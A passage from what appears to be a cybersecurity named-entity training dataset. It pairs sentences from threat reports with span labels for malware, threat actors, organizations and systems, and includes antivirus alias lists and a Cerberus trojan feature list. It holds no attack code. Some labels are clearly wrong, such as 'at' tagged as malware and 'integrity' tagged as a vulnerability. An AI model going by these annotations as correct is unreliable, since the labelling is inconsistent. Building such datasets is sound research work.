6e995d68c724f121d43ec2ff59bc4e536192360afa3beaec5646f01094f0b745 bbc268ca63eeb27e424fec1b3976bab550da304de18e29faff94d9057b1fa25a dc3dd9d75120934333496d0a4100252b419ee8fcdab5d74cf343bcb0306c9811 e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049 ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5 f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df Tracking down the developer of Android adware affecting millions of users 24 Oct 2019 - 11:30AM We detected a large adware campaign running for about a year , with the involved apps installed eight million times from Google Play alone .", "spans": {"SYSTEM: Android": [[1371, 1378]], "SYSTEM: Google Play": [[1557, 1568]]}, "info": {"id": "cyner2_train_000517", "source": "cyner2_train"}} {"text": "The campaign was able to steal large amounts of data despite using relatively simple malware because it used clever social engineering tactics against its targets.", "spans": {"THREAT_ACTOR: campaign": [[4, 12]], "MALWARE: malware": [[85, 92]], "THREAT_ACTOR: social engineering": [[116, 134]], "ORGANIZATION: targets.": [[155, 163]]}, "info": {"id": "cyner2_train_000519", "source": "cyner2_train"}} {"text": "It may also download potentially malicious files.", "spans": {"MALWARE: malicious files.": [[33, 49]]}, "info": {"id": "cyner2_train_000521", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Kryptik.byz Trojan.Win32.Malware.1 Trojan.Kryptik.HFN Packed:W32/RoxorCrypt.A Trojan.DownLoad.35818 TROJ_RENOS.BHAM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000522", "source": "cyner2_train"}} {"text": "To that end, we are elevating the OilRig attack campaign to be known as the OilRig group.", "spans": {"THREAT_ACTOR: the OilRig attack campaign": [[30, 56]], "THREAT_ACTOR: the OilRig group.": [[72, 89]]}, "info": {"id": "cyner2_train_000523", "source": "cyner2_train"}} {"text": "We believe the espionage factor and political context make their 
attacks unique and very different from traditional targeted attacks.", "spans": {"THREAT_ACTOR: the espionage": [[11, 24]]}, "info": {"id": "cyner2_train_000527", "source": "cyner2_train"}} {"text": "In particular, the focus was on Italian and Belgian users, but the StrongPity watering holes affected systems in far more locations than just those two.", "spans": {"THREAT_ACTOR: StrongPity": [[67, 77]], "SYSTEM: systems": [[102, 109]]}, "info": {"id": "cyner2_train_000528", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.MiadheardLTO.Trojan Trojan/W32.Mask.348264 Trojandropper.Seedna Troj.W32.Careto!c Trojan/Appetite.c BKDR_CARETO.A W32/Mask.B Backdoor.Weevil.B BKDR_CARETO.A Trojan.Win32.Careto.au Trojan.Win32.Careto.dtnkyq Backdoor:W32/Mask.A W32/Mask.JDVW-6006 Trojan/SGH.c W32.Trojan.Careto Trojan/Win32.SGH Trojan.Mask.3 Trojan.Win32.Careto.au TrojanDropper:Win32/Seedna.A Trojan/Win32.Careto.C258082 Backdoor.Mask Win32/Appetite.C Win32.Trojan.Careto.Tcvo Trojan.SGH! Backdoor.Mask W32/Careto.AU!tr Win32/Trojan.d4e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000532", "source": "cyner2_train"}} {"text": "Symantec believes that the attackers behind the Anthem breach are part of a highly resourceful cyberespionage group called Black Vine.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: attackers": [[27, 36]], "ORGANIZATION: Anthem": [[48, 54]], "THREAT_ACTOR: cyberespionage group": [[95, 115]], "THREAT_ACTOR: Black Vine.": [[123, 134]]}, "info": {"id": "cyner2_train_000533", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 BehavesLike.Win32.Multiplug.ch Trojan:Win32/Autophyte.A!dha Backdoor/Win32.Akdoor.R198284", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000534", "source": "cyner2_train"}} {"text": "The information is ideal for security professionals who investigate suspicious network activity in an Active Directory AD 
environment.", "spans": {"ORGANIZATION: security professionals": [[29, 51]], "SYSTEM: Active Directory AD environment.": [[102, 134]]}, "info": {"id": "cyner2_train_000536", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Visel.249856 Win32.Trojan.WisdomEyes.16070401.9500.9992 W32/Downldr2.DGSB BKDR_VISEL.DEN Win.Trojan.Visel-58 Trojan.Win32.Kebot.wbjcg Trojan.Win32.Downloader.249856.G Backdoor.Win32.Visel.~C BackDoor.Pigeon.12692 BKDR_VISEL.DEN W32/Downloader.STUZ-5379 Trojan[Backdoor]/Win32.Visel Backdoor:Win32/Visel.C Trojan/Win32.Xema.C45221 Backdoor.Visel Backdoor.Visel!uQ/Wu3cIR5E Bck/Pigeon.FK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000538", "source": "cyner2_train"}} {"text": "This is not the first time the country has been a victim of an APT.", "spans": {"THREAT_ACTOR: APT.": [[63, 67]]}, "info": {"id": "cyner2_train_000539", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Droma.S60541 TrojWare.Win32.Sventore.A Trojan.MulDrop7.3471 W32/Trojan.IGFK-3098 TR/Aenjaris.ofeiu Trojan[Dropper]/Win32.Injector Trojan:Win32/Aenjaris.AI!bit Trojan.Zusy.D3FD29 Dropper/Win32.Injector.C1617864 BScope.Trojan.SvcHorse.01643", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000541", "source": "cyner2_train"}} {"text": "The use of the obfuscation techniques was novel and this advisory discusses those in detail, along with how we detected them.", "spans": {}, "info": {"id": "cyner2_train_000542", "source": "cyner2_train"}} {"text": "DiamondFox list of panels.", "spans": {"ORGANIZATION: DiamondFox": [[0, 10]]}, "info": {"id": "cyner2_train_000543", "source": "cyner2_train"}} {"text": "It tends to reuse old exploits and doesn't make an effort to disguise their activity.", "spans": {}, "info": {"id": "cyner2_train_000544", "source": "cyner2_train"}} {"text": "Its main target was larger organizations with an annual income of USD 5 million or higher.", "spans": 
{"ORGANIZATION: organizations": [[27, 40]]}, "info": {"id": "cyner2_train_000546", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Downloader.Quanader TROJ_PLISKAL.SM Trojan.Win32.Pliskal.etapgz Trojan.DownLoader25.64837 Trojan.Pliskal.Win32.48 TROJ_PLISKAL.SM Trojan.Win32.Pliskal Trojan.Zusy.D3EBDA Trojan/Win32.Pliskal.C1788294 Trojan.QuantLoader W32/Vilsel.CYCY!tr.dldr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000547", "source": "cyner2_train"}} {"text": "A new threat actor group from Europe is selling malware, including the Typhon Stealer, RootFinder Miner, and the Cryptonic Crypter, according to CYFIRMA research team.", "spans": {"THREAT_ACTOR: new threat actor group": [[2, 24]], "MALWARE: malware,": [[48, 56]], "MALWARE: the Typhon Stealer, RootFinder Miner,": [[67, 104]], "MALWARE: the Cryptonic Crypter,": [[109, 131]], "ORGANIZATION: CYFIRMA research team.": [[145, 167]]}, "info": {"id": "cyner2_train_000548", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Buzy.D9C9 Downloader.Pelfpoi TROJ_PELPOI.SMIA Trojan.Win32.Snojan.bxtm TROJ_PELPOI.SMIA BehavesLike.Win32.PUPXAQ.wc Worm/Win32.AutoRun TrojanDownloader:Win32/Pelfpoi.L Trojan.Win32.Snojan.bxtm Downloader/Win32.Korad.R3803 W32/TrojanDldr.QJW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000549", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Phrovon.A TROJ_DLOADER.ZZT TROJ_DLOADER.ZZT Trojan.Win32.VB.euylta TrojWare.Win32.TrojanDownloader.VB.PMEA Trojan.DownLoader6.39644 BehavesLike.Win32.VBObfus.nz W32.Malware.Downloader TR/Dldr.VB.WNE TrojanDownloader:Win32/Phrovon.A Trojan.DL.Phrovon!yEJ5Hieu3rA Trojan-Downloader.Win32.Phrovon W32/VB.CWZ!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000550", "source": "cyner2_train"}} {"text": "There is a new malware called Rurktar.", "spans": {"MALWARE: new 
malware": [[11, 22]], "MALWARE: Rurktar.": [[30, 38]]}, "info": {"id": "cyner2_train_000551", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.VBNA!O Trojan.VB.Win32.37651 Trojan.Heur.VP.E1E33B Win32.Trojan.WisdomEyes.16070401.9500.9951 Win.Trojan.VB-23833 Worm.Win32.VBNA.b Trojan.Win32.VB.etozpu W32.W.VBNA.lrnh Win32.Worm.Vbna.Sxew Trojan.DownLoader5.9157 Trojan.Win32.Doxiss W32/Trojan.DVWP-9373 Worm.VBNA.ahfg Worm/Win32.VBNA Trojan:Win32/Doxiss.A Worm.Win32.A.VBNA.147456.BA Worm.Win32.VBNA.b Worm/Win32.VBNA.C118872 TScope.Trojan.VB Win32/Spy.VB.NXN TrojanSpy.VB!5WGwmuBMWXM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000552", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Crypt.i Trojan/Crypt.i Win32/TrojanProxy.Lager.F W32/Lager.AI Trojan.Abwiz.D Klone.R Trojan.Crypt Trojan-Proxy.Win32.Lager.q Trojan.Proxy.Lager.Q Trojan-Proxy.Win32.Lager!IK TrojWare.Win32.TrojanProxy.Lager.F Trojan.Proxy.Lager.Q Trojan.Lopata TR/Drop.Abwiz TROJ_LAGER.F Trojan/Crypt.bh Trojan.Proxy.Lager.Q W32/Lager.AI Win-Dropper/Small.agq Trojan-Proxy.Win32.Lager.f Trojan-Proxy.Lager.f Trojan-Proxy.Win32.Lager Proxy.NM Bck/Galapoper.HP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000555", "source": "cyner2_train"}} {"text": "This is an interesting attack of the infamous Syrian Electronic Army SEA.", "spans": {"THREAT_ACTOR: infamous Syrian Electronic Army SEA.": [[37, 73]]}, "info": {"id": "cyner2_train_000556", "source": "cyner2_train"}} {"text": "Many of the targets are involved in litigation with the government of Kazakhstan in European and American courts whose substance ranges from attempts by the government of Kazakhstan to unmask the administrators behind an anonymous website that publishes leaks alleging government corruption Kazaword to allegations of kidnapping.", "spans": {"ORGANIZATION: the government of Kazakhstan": [[52, 80], [153, 181]], "ORGANIZATION: American courts": 
[[97, 112]]}, "info": {"id": "cyner2_train_000557", "source": "cyner2_train"}} {"text": "ESET researchers have since analyzed samples of malware, detected by ESET as Win32/Industroyer, capable of performing exactly that type of attack.", "spans": {"ORGANIZATION: ESET researchers": [[0, 16]], "MALWARE: malware,": [[48, 56]], "ORGANIZATION: ESET": [[69, 73]]}, "info": {"id": "cyner2_train_000560", "source": "cyner2_train"}} {"text": "To infect a Windows computer, the user has to execute the malware by double-clicking on the .jar file.", "spans": {"SYSTEM: Windows computer,": [[12, 29]], "MALWARE: malware": [[58, 65]]}, "info": {"id": "cyner2_train_000561", "source": "cyner2_train"}} {"text": "ServStart is primarily used by attackers located in China, in a mix of targeted and opportunistic attacks.", "spans": {"MALWARE: ServStart": [[0, 9]], "THREAT_ACTOR: attackers": [[31, 40]]}, "info": {"id": "cyner2_train_000564", "source": "cyner2_train"}} {"text": "FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission SEC filings at various organizations.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: FIN7 spear phishing campaign": [[28, 56]], "ORGANIZATION: personnel": [[67, 76]], "ORGANIZATION: United States Securities and Exchange Commission SEC": [[91, 143]], "ORGANIZATION: various organizations.": [[155, 177]]}, "info": {"id": "cyner2_train_000565", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Hupigon!O Win32.Trojan.WisdomEyes.16070401.9500.9976 Backdoor.Win32.Hupigon.pjz BackDoor.Klj.25 BehavesLike.Win32.PWSGamania.fc Backdoor.Win32.Hupigon Trojan.Zilix.1 Backdoor.Win32.Hupigon.pjz Trojan/Win32.Hupigon.C127321 TScope.Trojan.Delf Win32.Backdoor.Hupigon.dgrz", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000567", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ursu.D15C9E 
Win32.Trojan.WisdomEyes.16070401.9500.9977 Backdoor.Trojan BKDR_ZEGOST.SM44 Trojan.Win32.Farfli.extksh Trojan.Win32.Z.Zegost.671744.A TrojWare.Win32.AntiAV.~D BKDR_ZEGOST.SM44 BehavesLike.Win32.Dropper.jm W32/Trojan.VXKT-0024 BDS/Zegost.pmxfd Trj/GdSda.A Win32.Trojan-gamethief.Onlinegames.Dvgf Backdoor.Win32.Dedipros Win32/Trojan.6ef", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000568", "source": "cyner2_train"}} {"text": "By mid-1998 the FBI and Department of Defense investigators had forensic evidence pointing to Russian ISPs.", "spans": {"ORGANIZATION: the FBI": [[12, 19]], "ORGANIZATION: Department of Defense investigators": [[24, 59]]}, "info": {"id": "cyner2_train_000570", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Diple!O Worm.Yames W32/VBTrojan.9!Maximus WORM_YAMES.A WORM_YAMES.A Worm.Win32.VB W32/VBTrojan.9!Maximus Worm:Win32/Yames.A Trj/CI.A Win32/VB.ODO Win32.Worm.Vb.Sxeo W32/Vb.A!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000572", "source": "cyner2_train"}} {"text": "Regin has a wide range of standard capabilities, particularly around monitoring targets and stealing data.", "spans": {"MALWARE: Regin": [[0, 5]]}, "info": {"id": "cyner2_train_000573", "source": "cyner2_train"}} {"text": "Due to the violation of the integrity and availability of the web resources of a number of state organizations, the Government Computer Emergency Response Team of Ukraine CERT-UA is taking measures to investigate the circumstances of the incident on February 23, 2023.", "spans": {"VULNERABILITY: integrity": [[28, 37]], "SYSTEM: web resources": [[62, 75]], "ORGANIZATION: state organizations, the Government Computer Emergency Response Team of Ukraine CERT-UA": [[91, 178]]}, "info": {"id": "cyner2_train_000574", "source": "cyner2_train"}} {"text": "A backdoor also known as: HackTool.Mimikatz.S1196261 Tool.Mimikatz.Win32.409 W32/Petya.S Ransom.Petya Win.Trojan.Mimikatz-6331391-0 
Riskware.Win32.Mimikatz.eqnxjb Troj.PSW32.W.WinCred.tp7F Win32.Trojan.Mimipet.Aiin Trojan:W32/Petya.H Tool.Mimikatz.64 W32/Petya.VKHI-2239 Trojan.Petya.e TR/Mimipet.airfqba Trojan[PSW]/Win32.WinCred Trojan:Win32/Petya.B!rsm Win32.Riskware.Mimikatz.A Trojan/Win32.Petya.R203330 Trojan.Ransom.Petya BScope.Trojan-Dropper.Injector Trojan.Petya Win32/RiskWare.Mimikatz.U Trojan.PWS.WinCred! hacktool.mimikatz W32/Petya.A!tr.ransom Trj/CryptoPetya.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000575", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.BitcodeN.Trojan Trojan.Dropper.VRM Trojan.FakeAV Trojan.Dropper.VRM TSPY_VBKEYLOG.SM Win32.Trojan.WisdomEyes.16070401.9500.9793 Win32/Tnega.ASRH TSPY_VBKEYLOG.SM Trojan.Dropper.VRM Trojan.Dropper.VRM Trojan.Dropper.VRM BehavesLike.Win32.Downloader.bh TR/Spy.jyiej Trojan:Win32/Glod.B Trojan.Dropper.VRM Trojan.Dropper.VRM Trojan.KeyLogger.OEU Win32/Spy.KeyLogger.OEU Backdoor.Win32.Xtrat", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000576", "source": "cyner2_train"}} {"text": "Since then, we've encountered more samples in the wild.", "spans": {}, "info": {"id": "cyner2_train_000577", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.GJUE Hacktool.Rootkit Win32/Fuzfle.BZ Trojan.Win32.Sentinel.cquvjc Trojan.Sentinel.based Trojan.Spammer W32/Trojan.UUTE-6344 Trojan/Win32.Unknown Spammer:WinNT/Srizbi.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000578", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.RazyNHmA.Trojan Trojan.Kryptik.Win32.1323308 Win32.Trojan.Kryptik.aio Ransom.TeslaCrypt!g6 WORM_HPKASIDET.SM0 Trojan.Win32.Kryptik.evtvij Trojan.DownLoader25.63634 WORM_HPKASIDET.SM0 BehavesLike.Win32.Downloader.cc Trojan-Downloader.Win32.Wauchos Worm.Ngrbot.aeb TR/Crypt.ZPACK.avthl Backdoor:Win32/Pigskarb.A Trojan.Symmi.D104A4 
Trojan/Win32.Upbot.C1489911 W32/Kryptik.FXQD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000580", "source": "cyner2_train"}} {"text": "At the request of the German Bundestag the BSI analyzed these problems in network traffic.", "spans": {"ORGANIZATION: the German Bundestag the BSI": [[18, 46]], "SYSTEM: network traffic.": [[74, 90]]}, "info": {"id": "cyner2_train_000581", "source": "cyner2_train"}} {"text": "A backdoor also known as: VB:Trojan.Valyria.335 W97M.Downloader.AFY W97M/Downloader.bxd VB:Trojan.Valyria.335 W97M.Downloader Win32/DarkNeuron.A W2KM_DARKNEURON.A VB:Trojan.Valyria.335 Trojan.Ole2.Vbs-heuristic.druvzi Heur:Trojan.Script.Downloader.7020638.0 VB:Trojan.Valyria.335 W2KM_DARKNEURON.A W97M/Downloader.bxd TrojanDropper:O97M/DarkNeuron.A!dha VB:Trojan.Valyria.335 virus.office.qexvmc.1100", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000584", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Exploit.Win32.BypassUAC.gmk Trojan.MulDrop7.677 BehavesLike.Win32.BadFile.ch Trojan-Downloader.MSIL.Tiny W32/Trojan.RVEW-7367 Exploit.Win32.BypassUAC.gmk TrojanDownloader:MSIL/BrobanDel.C!bit Win32.Trojan.Downloader.Phqh MSIL/Tiny.QK!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000585", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DowlodN.Trojan W32/Downldr2.BCPJ Win.Downloader.24666-2 Trojan.Spambot.3004 BehavesLike.Win32.MoonLight.mc W32/Downloader.EITQ-0059 Trojan:Win32/Pramro.A Trojan.Win32.Downloader.28160.AO Trojan/Win32.CSon.R2002 Virus.Win32.Sality Bck/Spambot.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000588", "source": "cyner2_train"}} {"text": "Ovidiy Stealer is priced at 450-750 Rubles ~$7-13 USD for one build, a price that includes a precompiled executable that is also crypted to thwart analysis and detection.", "spans": {"MALWARE: Ovidiy 
Stealer": [[0, 14]], "MALWARE: crypted": [[129, 136]]}, "info": {"id": "cyner2_train_000589", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.Sekur.14236 Win32.Trojan.WisdomEyes.16070401.9500.9974 Trojan.Win32.Z.Sirefef.150528 Win32.Trojan.Crypt.Ligd BackDoor.Anunak.8 W32/Trojan.RFBB-7838 Trojan.Sirefef.181 PWS:Win32/Sekur.A Trj/GdSda.A Win32/Trojan.0c8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000590", "source": "cyner2_train"}} {"text": "Once they have access to the network they proceed to encrypt multiple Windows systems using SamSam.", "spans": {"SYSTEM: Windows systems": [[70, 85]], "MALWARE: SamSam.": [[92, 99]]}, "info": {"id": "cyner2_train_000592", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Bladabindi.FC.2865 Trojan/Bladabindi.u TROJ_SPNR.0BGN14 Win32.Trojan.WisdomEyes.16070401.9500.9994 Win32/Tnega.MAGYUTC TROJ_SPNR.0BGN14 MSIL.Backdoor.Bladabindi.AX BackDoor.NJRat.355 HackTool.MSIL W32/Trojan.UVRI-0473 Trojan/MSIL.fiv W32.Hack.Tool HackTool:MSIL/Jaktinier.A!plugin HackTool.Jaktinier Trj/CI.A MSIL/Bladabindi.U Win32/Trojan.b0d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000593", "source": "cyner2_train"}} {"text": "ITG03 actors stole money from multiple international banks via the compromise of the interbank funds transfer system SWIFT in 2016.", "spans": {"THREAT_ACTOR: ITG03 actors": [[0, 12]], "ORGANIZATION: multiple international banks": [[30, 58]], "ORGANIZATION: the interbank funds": [[81, 100]], "SYSTEM: transfer system SWIFT": [[101, 122]]}, "info": {"id": "cyner2_train_000595", "source": "cyner2_train"}} {"text": "This appears to be an attack campaign focused on espionage.", "spans": {"THREAT_ACTOR: attack campaign": [[22, 37]], "THREAT_ACTOR: espionage.": [[49, 59]]}, "info": {"id": "cyner2_train_000596", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Symmi.DC2FF Win32.Trojan.WisdomEyes.16070401.9500.9877 
Trojan.Win32.VB.ctxv Troj.W32.VB.mgqM Win32.Trojan.Vb.Ahyc TrojWare.Win32.Injector.DSTF Trojan:W32/Bepush.B Trojan.Blocker.Win32.25483 BehavesLike.Win32.Dropper.jh Trojan/VB.cxjy TR/Crypt.cfi.besd Trojan.Win32.VB.ctxv Trojan/Win32.Asprox.R132179 Win32/VB.RTN Trojan.VB!fKAQ4AnWSUA Trojan.Crypt W32/ExtenBro.AK!tr Win32/Trojan.682", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000597", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanPWS.Zbot.A4 Backdoor.Bot Troj.Dropper.W32.Dapato!c Win32.Trojan.WisdomEyes.16070401.9500.9991 Trojan.Zbot Win32.Trojan.Injector.CZ Trojan-Dropper.Win32.Dapato.ezng Trojan.Win32.Dapato.driscq Trojan.Emotet.63 BehavesLike.Win32.VirRansom.cc Trojan.Win32.Injector Trojan/Yakes.tsq Trojan/Win32.Deshacop Spammer:Win32/Emotet.G Trojan-Dropper.Win32.Dapato.ezng Trojan/Win32.Injector.R140545 BScope.Malware-Cryptor.Hlux Trj/PasswordStealer.BT W32/Injector.BYFS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000600", "source": "cyner2_train"}} {"text": "The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks.", "spans": {"MALWARE: at": [[20, 22]], "ORGANIZATION: organization": [[33, 45]]}, "info": {"id": "cyner2_train_000602", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_RUCE.C Win32.Trojan.WisdomEyes.16070401.9500.9969 TROJ_RUCE.C W32/Trojan.UCZC-3562 TR/Ruce.44544A Trojan.Hiloti.2 Trojan/Win32.Ruce.C1864771 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000604", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper/W32.Dapato.59904.C Trojan.Foidan Spyware.Zbot.ED TROJ_SPNR.11EJ13 Win32.Trojan.WisdomEyes.16070401.9500.9898 Trojan.Zbot TROJ_SPNR.11EJ13 Trojan-Dropper.Win32.Dapato.cdtt Trojan.Win32.Dapato.cqljwd Troj.Dropper.W32.Dapato.cdtt!c TrojWare.Win32.Kryptik.BAXK Trojan.Inject1.21866 Dropper.Dapato.Win32.27589 
Trojan-Spy.Win32.Zbot W32/Trojan.JZAQ-0520 TrojanDropper.Dapato.sad TR/Drop.Dapato.cdtt Trojan[Dropper]/Win32.Dapato Trojan.Zusy.DD28A Trojan-Dropper.Win32.Dapato.cdtt Trojan:Win32/Foidan.A TrojanDropper.Dapato Win32.Trojan-dropper.Dapato.Pgng Trojan.DR.Dapato!3ZrfcO/CUjc W32/ZAccess.Y!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000605", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.NSIS Troj.Nsis.Decryptor!c Trojan.Win32.Z.Decryptor.478934 Trojan.Inject1.52881 Trojan.Inject3 W32/Trojan.SALD-6852 Win32/Injector.BQWC Trojan.NSIS.Decryptor.m TrojanDropper:Win32/Bondat.A Trojan.Decryptor!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000607", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DepanserX.Trojan Backdoor/W32.Prorat.351276.AA Backdoor.Win32.Prorat!O Backdoor.Prorat.A8 Backdoor.Prorat.Win32.7 Backdoor/Prorat.b Win32.Trojan.WisdomEyes.16070401.9500.9886 W32/ProratP.L Backdoor.Prorat Win32/ProRat.I BKDR_PRORAT.F Win.Trojan.Prorat-9 Backdoor.Win32.Prorat.b Trojan.Win32.Prorat.fzuk Backdoor.W32.Prorat.l70O BackDoor.ProRat.1736 BKDR_PRORAT.F BehavesLike.Win32.Backdoor.fc W32/ProratP.L Backdoor/Prorat.cm BDS/Prorat.AC Trojan[Backdoor]/Win32.Prorat.f Backdoor:Win32/Prorat.N Backdoor.Win32.Prorat.351276.B Backdoor.Win32.Prorat.b Win32.Backdoor.Prorat.A Trojan/Win32.Prorat.R1757 MalwareScope.Trojan-PSW.Pinch.1 Backdoor.Prorat.AJ Backdoor.Win32.Prorat W32/Prorat.I!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000608", "source": "cyner2_train"}} {"text": "As it turns out, the downloaded file is an HTA HTML Application file, a format that is becoming more and more common as a malware launch point.", "spans": {"MALWARE: malware": [[122, 129]]}, "info": {"id": "cyner2_train_000609", "source": "cyner2_train"}} {"text": "This blog entry will introduce the details of Asruex.", "spans": {}, "info": {"id": "cyner2_train_000610", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Rockse.Win32.2 BKDR_ROCKSE.A Backdoor.Rockse BKDR_ROCKSE.A Backdoor.Win32.Rockse Trojan.Win32.Rockse.hkwa Backdoor.Win32.Rockse BackDoor.Rockse BehavesLike.Win32.Dropper.gc Trojan.Win32.Rockse W32/Risk.RDKH-7511 BDS/Rockse.2 Trojan[Backdoor]/Win32.Rockse Win32.Hack.Rockse.kcloud Backdoor.W32.Rockse!c Backdoor.Win32.Rockse Backdoor.Rockse Win32.Backdoor.Rockse.Wkbu Backdoor.Rockse!5s6/g9tFaiQ W32/Rockse.A!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000611", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Z.Notsocial.240128 Trojan.EmailSpy.origin BehavesLike.Win32.BadFile.dc Downloader/Win32.Mdm.R1834 Trojan.Win32.SpamTool", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000612", "source": "cyner2_train"}} {"text": "These countries are linked by a trade agreement as well as a cooperation on a range of non-financial matters.", "spans": {}, "info": {"id": "cyner2_train_000615", "source": "cyner2_train"}} {"text": "Cerberus embeds the following set of features that allows itself to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( Local injects obtained from C2 ) Keylogging SMS harvesting : SMS listing SMS harvesting : SMS forwarding Device info collection Contact list collection Application listing Location collection Overlaying : Targets list update SMS : Sending Calls : USSD request making Calls : Call forwarding Remote actions : App installing Remote actions : App starting Remote actions : App removal Remote actions : Showing arbitrary web pages Remote actions : Screen-locking Notifications : Push notifications C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Architecture : Modular Overlay attack Most Android banking Trojans use overlay attacks to trick the victim into providing their 
personal information ( such as but not limited to : credit card information , banking credentials , mail credentials ) and Cerberus is no exception .", "spans": {"MALWARE: Cerberus": [[0, 8], [1041, 1049]]}, "info": {"id": "cyner2_train_000616", "source": "cyner2_train"}} {"text": "A backdoor targetting Linux also known as: Trojan.Unix.Mlw.evxpjx Linux.Trojan.Rootkit.40 Trojan/Linux.Rootkit.40 Trojan.Linux.Rootkit Linux/RootKit.40 Win32/RootKit.Rootkit.05f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000617", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SvchostPP.Worm Trojan.VBS.Downloader.U Trojan.VBS.Downloader.U Trojan.StartPage.Win32.8162 Trojan.VBS.Downloader.U Win32.Trojan.WisdomEyes.16070401.9500.9984 W32/Trojan2.MMWH Trojan.Qhosts Win32/Delf.OF TROJ_FAM_00011b6.TOMA Win.Trojan.Delf-8259 Trojan.VBS.Downloader.U Trojan.VBS.Qhost.v Trojan.VBS.Downloader.U Trojan.Win32.StartPage.blxqw Trojan.VBS.Downloader.U Trojan.MulDrop1.37420 TROJ_FAM_00011b6.TOMA BehavesLike.Win32.Downloader.ch Trojan.VBS.Qhost W32/Trojan.DBWF-7475 Troj.VBS.StartPage.lgP3 Trojan.VBS.Qhost.v Trojan/Win32.Fakesys.R2395 VBS/TrojanDownloader.Psyme.NHE Trojan.DL.Delf.FCBW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000618", "source": "cyner2_train"}} {"text": "The Carbanak financial APT group made the headlines when Group-IB and 